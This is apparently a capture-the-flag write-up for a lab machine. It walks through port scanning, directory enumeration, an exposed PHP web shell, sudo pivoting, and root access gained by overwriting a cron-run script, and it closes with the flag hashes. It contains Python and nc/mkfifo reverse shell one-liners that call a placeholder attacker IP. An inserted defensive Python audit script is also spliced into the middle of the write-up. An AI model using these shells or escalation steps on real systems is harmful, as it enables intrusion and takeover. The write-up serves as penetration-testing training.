Nmap Results
# Nmap 7.93 scan initiated Wed Mar 29 00:20:11 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt 10.129.97.27
Nmap scan report for 10.129.97.27
Host is up (0.014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 12.31 ms 10.10.14.1
2 12.42 ms 10.129.97.27
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 00:20:34 2023 -- 1 IP address (1 host up) scanned in 23.26 seconds
Service Enumeration
TCP/80

gobuster dir -u http://10.129.97.27 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 100 -o gobuster.txt
/about.html (Status: 200) [Size: 8193]
/config.php (Status: 200) [Size: 0]
/contact.html (Status: 200) [Size: 7805]
/css (Status: 200) [Size: 1759]
/dev (Status: 200) [Size: 1149]
/fonts (Status: 200) [Size: 2096]
/images (Status: 200) [Size: 1565]
/index.html (Status: 200) [Size: 7743]
/js (Status: 200) [Size: 3166]
/php (Status: 200) [Size: 940]
/scroll.html (Status: 200) [Size: 10863]
/single.html (Status: 200) [Size: 7477]
/uploads (Status: 200) [Size: 14]
Looking at the output, the most immediately interesting resources are:
/dev/
/php/
/uploads
And just like that, we found the phpbash.php script:


Great, so we've got command execution on the target! Let's see if I can ping my VPN IP.


Excellent! We can communicate back to my Kali instance, so the prospects of a reverse shell have become that much more promising. Netcat is installed on the target, but does not support the -e parameter.

Exploit
The system administrator made a sensitive directory on the web server globally readable. This directory contains a PHP script that allows an unauthenticated user to execute arbitrary commands on the remote server. This directory should not be globally readable, and ideally the development environment should be isolated in a non-public network.
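The following audit script is an added example and is not part of the original write-up. It models the exposure described above from the defender's side: it walks a web root, flags development or upload directories that are being served at all, and lists any PHP file that references a PHP command-execution function (shell_exec, system, passthru and the like). The directory names, the sample files and their contents are constructed for this example; the real phpbash.php source is not reproduced here.

```python
"""Audit a web root for served development directories and PHP files that
can run OS commands.  Added example; paths, file contents and the indicator
list are constructed for illustration."""
import os
import re
import tempfile

# PHP functions that hand a string to the OS shell or spawn a process.
# Their presence in a web-reachable file is a finding to review, not proof
# of a web shell by itself.
EXEC_CALL_RE = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(", re.IGNORECASE
)

# Directory names that should not be served from a production web root.
RISKY_DIRS = {"dev", "uploads", "tmp", "backup"}


def scan_php_file(path):
    """Return the sorted list of execution functions referenced in one PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return sorted({m.group(1).lower() for m in EXEC_CALL_RE.finditer(fh.read())})


def audit_webroot(webroot):
    """Walk webroot and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        parts = set(rel_dir.split(os.sep)) - {"."}
        if parts & RISKY_DIRS:
            findings.append((rel_dir, "development/upload directory served from web root"))
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, name)
            calls = scan_php_file(full)
            if calls:
                findings.append((os.path.relpath(full, webroot), "calls " + ", ".join(calls)))
    return sorted(findings)


def build_demo_webroot():
    """Create a constructed web root resembling the one enumerated above."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "index.html": "<html><body>Development Site</body></html>\n",
        # A benign PHP helper: no command execution, should not be flagged.
        "php/sendMail.php": "<?php\n// constructed sample\nmail($to, $subject, $body);\n",
        # A constructed dev helper that runs commands; stands in for phpbash.php.
        "dev/phpbash.php": "<?php\n// constructed sample\n$out = shell_exec($cmd);\necho $out;\n",
    }
    for rel, content in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    os.makedirs(os.path.join(root, "uploads"), exist_ok=True)  # empty but served
    return root


if __name__ == "__main__":
    for path, reason in audit_webroot(build_demo_webroot()):
        print(f"{path}: {reason}")
```

Run against a real web root (for example /var/www/html) the same function gives a short list to act on: move the development tree off the public host, or at minimum deny it in the Apache configuration, and remove any script that exposes command execution.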
Reverse Shell
Attack Box
sudo rlwrap nc -lnvp 80
Target
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<vpn-ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Post-Exploit Enumeration
Current User
uid=33(www-data) gid=33(www-data) groups=33(www-data)
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
OS & Kernel
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Users
arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash
Groups
arrexel:x:1000:
adm:x:4:syslog,arrexel
cdrom:x:24:arrexel
sudo:x:27:arrexel
dip:x:30:arrexel
plugdev:x:46:arrexel
lpadmin:x:114:arrexel
sambashare:x:115:arrexel
scriptmanager:x:1001:
Network
Interfaces
ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:4b:66 brd ff:ff:ff:ff:ff:ff
inet 10.129.97.27/16 brd 10.129.255.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:4b66/64 scope global mngtmpaddr dynamic
valid_lft 86394sec preferred_lft 14394sec
inet6 fe80::250:56ff:feb9:4b66/64 scope link
valid_lft forever preferred_lft forever
ARP Table
N/A
Routes
N/A
Open Ports
All open ports previously enumerated.
Ping Sweep
N/A
Processes
No interesting processes
Services
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
init.scope loaded active running System and Service Manager
accounts-daemon.service loaded active running Accounts Service
apache2.service loaded active running LSB: Apache2 web server
cron.service loaded active running Regular background program pr
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
open-vm-tools.service loaded active running Service for virtual machines
rsyslog.service loaded active running System Logging Service
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
dbus.socket loaded active running D-Bus System Message Bus Sock
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
Scheduled Tasks
No interesting scheduled tasks.
Interesting Files
/scripts/test.py
Permission denied (see privilege escalation)
/scripts/test.txt
Permission denied (see privilege escalation)
Privilege Escalation
Lateral Pivot
The most obvious privilege escalation path from the initial access is the output of the sudo -l command above when enumerating the current user, as it showed that we can run any command as the user scriptmanager without a password. We can use this to spawn a Bash sub-process as scriptmanager.
sudo -u scriptmanager /bin/bash -ip

More Enumeration
From before, we found the interesting /scripts directory, which is owned by the scriptmanager user.




There's nothing particularly useful about this script at first glance. It just opens a file in write mode and adds the text "testing 123!" to it. But you'll notice that the test.txt file it writes to is owned by root.
That would lead me to believe that the root user has a cron job that runs this script at regular intervals, which would let us control, via this script, which file is read from and written to.
Test Script Modifications
Let's give it a test:
cd /scripts
cp test.py test.py.orig
sed -i 's/testing\ 123\!/0xBEN was here/' test.py

Then, we'll give it a minute or more to see if the file is overwritten with our new content.

Excellent! We can use this script to get a reverse shell as root.
Reverse Shell as Root
echo -e 'import os\nos.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [vpn-ip] [port] >/tmp/f")' > test.py

Flags
User
30713224fb6d6052e4a3531c810bfdc2
Root
b3f15ad04264315df873221871b3da80